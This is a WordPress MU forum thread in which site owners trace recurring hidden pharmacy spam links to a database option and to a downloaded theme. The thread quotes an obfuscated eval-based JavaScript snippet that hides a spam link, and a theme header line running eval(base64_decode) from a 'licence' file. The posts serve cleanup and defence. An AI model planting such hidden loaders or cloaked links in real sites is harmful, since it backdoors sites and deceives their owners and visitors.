WordPress MU

Hi experts,

recently i started seeing a link to http://www.valacyclovir.co.uk/ above the header of my site. I searched all the php files (header, index, single etc.) but found no trace of the above link. I then searched my SQL database and there it was under the "wp_1_options" table with the name of "credit_text2". I deleted it immediately, changed all my passwords (cpanel, SQL database etc) but later it appeared again.

I also updated my wordpress mu to the latest version but still no go. I don't know wat to do.. any expert, please advise!!

Thanks in advance,
Tenzin

You've checked all your plugins?

"I then searched my SQL database and there it was under the "wp_1_options" table with the name of "credit_text2"."

Check the THEME. Look in functions.php.

Yes SteveAtty, I checked all the plugins (both plugins and mu-plugins) by opening each php file and did a search for "Valaciclovir" but found no trace of it.

andrea_r, i checked all the php files in the themes folder like the above mentioned but found nothing. :-(

Isn't there a way to find how and when someone is injecting these code in phpMyadmin??

thanks alot for your all your help..

Here's what the table (wp_1_options) looks like in phpMyAdmin

option_id: 738

blog_id: 0

option_name: credit_text2

option_value: <div id="wraps">Valaciclovir</div>
<script language="javascript">
var wt = 'get'+'Element'
var stl = 'st'+'yle';
var _0xd22c=["function seeThat(elem) { eval(x22elem.x22+stl+x22.display=x27blockx27;x22); }"];
_0xd22c[0x0] = _0xd22c[0x0].replace(/block/i,"none");
eval(_0xd22c[0x0]);
</script>
<script>
var str = 'seeThat(document.getElementById("link"));';
eval(str.replace(/link/i,'wraps'));
</script>

autoload: yes

It might be in encoded in base64, look for something like base64_decode($blah) where $blah = a bunch of gibberish.

Example:

<?php
$str = 'VGhpcyBpcyBhbiBlbmNvZGVkIHN0cmluZw==';
echo base64_decode($str);
?>

I've commonly seen coded credits in "free themes": footer, index, sidebar, header, or functions. I don't think themes from the official wordpress site can have coded gibberish in them.

So what you need to look for is something that is outputting the option_name of credit_text2

so something like:

echo get_option( "credit_text2" );

But they might be passing it through an intermediate variable

What's the theme and where did you get it from?

Like dsader said, this is commonly used in themes to add credits you can't remove.

I finally got rid of it. It seems someone was stealing my ftp p/w everytime i used ftp. I removed the injected iframe from SQL and changed all the p/w again (cpanel, sql, ftp), this time i didn't use FTP for a few days and VOILA!! Problem Solved!!
i think this article explains my problem => http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
i hope my post will help someone facing same problem.
thanks everyone for your help. andrea, steve, dsader, everyone..

So how were they stealing your FTP password?

i have no idea how they were stealing my ftp p/w but when i stopped using my ftp software, the problem stopped.
For everyone's information i was using Cute FTP version 8

I was hacked and I'm using SmartFTP; the link is for Kamagra. I haven't had any luck locating the culprit.

One precaution one can take is not to save account details on watever ftp software one uses.
So NEVER STORE YOUR SITE'S FTP USERNAME AND PASSWORD ON YOUR FTP SOFTWARE

Oh God!! The problem started appearing again. I didn't use any FTP program till now but now (after many days) the problem started again but this time the iframe linked to http://www.vardenafil2.com is being injected.
I'm going nuts..

You need to talk to your hosting company.

Thank u steve, i knew there was something wrong with the hosting server. they deny having problems with the server but I feel their server is compromised.

Well it sounds like it, if you've reset passwords and someone is still getting in and changing files then there is something wrong somewhere.

I assume you've screwed down the security so that all the files on the server that don't need to be written to by the webserver user are read only?

It might also be worth making a note of the time of any changed file stamps which you might be able to use in help tracking down what is going on.

Once you fix your problem again, you can use this to find out about login attempts; and it works for all login attempts and not just Wordpress. This will help you pinpoint exactly where they are coming through, if in fact they are coming through any php script on your account. Then after that I would change the permissions of my root files to 444, just in case they may try to hack through those files. After you do this, if you are hacked again, then the issue is definitely with your hosting company.

Sounds like Gumblar.

Description:

Gumblar is the name of a growing botnet that compromises traditionally non-malicious Web servers in order to exploit Personal Computers (PCs) that visit those Web sites. Malware that redirects Google searches is planted on the target PC, which provides the attackers with "pay-per-click" or possibly other types of income. The malware also looks for FTP credentials on the PC and may use them to compromise additional Web sites.

Compromised Web sites do not appear to host malware or exploits, but instead host links and redirects to malicious servers elsewhere. One of the original servers used the domain gumblar.cn, which changed to martuz.cn and will likely change, again.

By the way, if they're getting your FTP credentials then it's probably your personal computer that is infected. The infection is modifying your web files that you then upload to your own host (which is how Gumblar spreads.)

As for not saving your FTP credentials in your FTP software, it won't make a difference. Every time you make an FTP connection, you are sending your username and password in clear text over the internet. Basic FTP does not encrypt the username/password in any way. So the easiest way to harvest your information is to simply have a little virus resident that monitors port 21. FTP runs on port 21, so they just watch for anything connecting on that and grab your info.

Hi, I have the exactly similar problem. There is this weird credit_text2 table in my database. After removing it the frontpage is ok. Last time I removed the credit_text2 and after that changed my passwords, but now the weird link has appeared again back to my frontpage. I have not used any ftp software, only Parallels Plesk.

What should I do next?

Credit text sounds like a theme reinserting footer links. Check to see of some of your themes have base64 encode in footer.php

That's not hack, it;s common for some theme places to do this with their themes or ones they re-release that are supposed to be good.

ok, thanks. I'll check that later. The site has been working for some months before the link appeared.

This is my site: http://rockynkuulumiset.net/

Hi, this is my theme's messy header code...

<head>
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<title><?php bloginfo('name'); ?> <?php require_once("theme_licence.php"); eval(base64_decode($f1); if ( is_single() ) { ?> » Blog Archive <?php } ?> <?php wp_title(); ?></title>)
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!--leave this for stats -->
<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/tabber.js"></script>

<?php wp_head(); ?>

</head>

theme_licence.php includes some coded content, could that have the weird link code?

it most certainly will do.

Can I get rid of that somehow?

Sure, just edit the header and remove :

require_once("theme_licence.php"); eval(base64_decode($f1);

Hi, I removed that code and also the one I found from sidebar.php. Still I can't get rid of that link. When I remove credit_text2 and credit_date2 tables from my database they will appear immediately back. Theme_licence.php seems to be used in somewhere else also because if I remove that whole file the site will not work anymore. Is theme_licence.php requided by Wordpress?

Problem solved for now. I found also base64coded start_template.php file which was read at header.php. By removing that line the link removed. Hopefully that fixed it permanently.

Hello, i have the same problem as "miika_p" and "thai916" but I install "antivirus" plugin and understand very easy that my theme "VivoVista" is infected an after few experiments understand that the original theme that i downloaded is realy infected.
"antivirus" plugin says that the infected files are:

functions.php
start_template.php
sidebar.php
theme_licence.php
header.php

my question is is it possible to solve the problem in the same way as "miika_p" just to remove
require_once("theme_licence.php"); eval(base64_decode($f1);

in addition i want to say that when i visited miika_p's blog i saw that he download theme from the same place i did : http://www.wpblogskins.com/